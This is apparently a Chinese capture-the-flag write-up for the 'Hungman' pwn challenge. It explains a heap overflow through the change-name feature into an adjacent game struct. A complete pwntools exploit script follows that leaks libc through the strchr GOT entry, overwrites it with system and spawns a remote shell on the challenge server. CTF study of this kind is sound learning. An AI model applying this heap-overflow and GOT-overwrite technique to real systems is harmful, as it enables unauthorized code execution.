Hungman

首先，检查一下程序的保护机制

然后，我们用IDA分析一下

最开始输入名字，根据名字长度申请堆

当我们打赢游戏，更改名字时，可以出现溢出

[之前的堆依然还是那个，而我们的输入的内容可以变得更长，导致溢出到下一个堆块，而下一个堆块正式游戏数据的结构体]{.mark}，我们就可以篡改，改成函数的got表地址，再次打赢游戏，就能泄露信息，同理，再来一次，修改got表

而这个游戏是一个猜字母的游戏，并且是这样记分数的

要猜的字母个数等于我们输入的用户名长度

我们如果输入长度大于26的名字，然后从a到z猜，就一定可约获胜

我们完整的exp脚本

#coding:utf8  
from pwn import *  
from LibcSearcher import *  
  
#sh = process('./hungman')  
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  
sh = remote('111.198.29.45',48979)  
elf = ELF('./hungman')  
strchr_got = elf.got['strchr']  
system_s = libc.sym['system']  
strchr_s = 0x89AB0  
  
def winGame():  
   for x in string.ascii_lowercase:  
      ans = sh.recv()  
      if 'High score! change name?' in ans:  
         break  
      if 'Continue?' in ans:  
         sh.sendline('y')  
      #print ans  
      sh.sendline(x)  
      sleep(0.2)  
  
sh.sendlineafter("What's your name?","a"*0x30)  
winGame()  
  
  
sh.sendline('y')  
sleep(0.5)  
payload = 'b'*0x30  
#溢出到结构体的内存位置处  
payload += p64(0) + p64(0x91)  
#score   name_len  
payload += p32(0x100) + p32(0x100)  
#name buf  
payload += p64(strchr_got)  
  
sh.sendline(payload)  
sh.recvuntil('Highest player: ')  
strchr_addr = u64(sh.recvuntil(' score:',drop = True).ljust(8,'\x00'))  
libc_base = strchr_addr - strchr_s  
system_addr = libc_base + system_s  
print 'libc_base=',hex(libc_base)  
print 'system_addr=',hex(system_addr)  
  
sh.sendlineafter('Continue?','y')  
winGame()  
sh.sendlineafter('High score! change name?','y')  
sleep(0.2)  
sh.send(p64(system_addr))  
  
sh.sendlineafter('Continue?','y')  
winGame()  
sh.sendline('y')  
sleep(0.5)  
sh.sendline('/bin/sh')  
  
sh.interactive()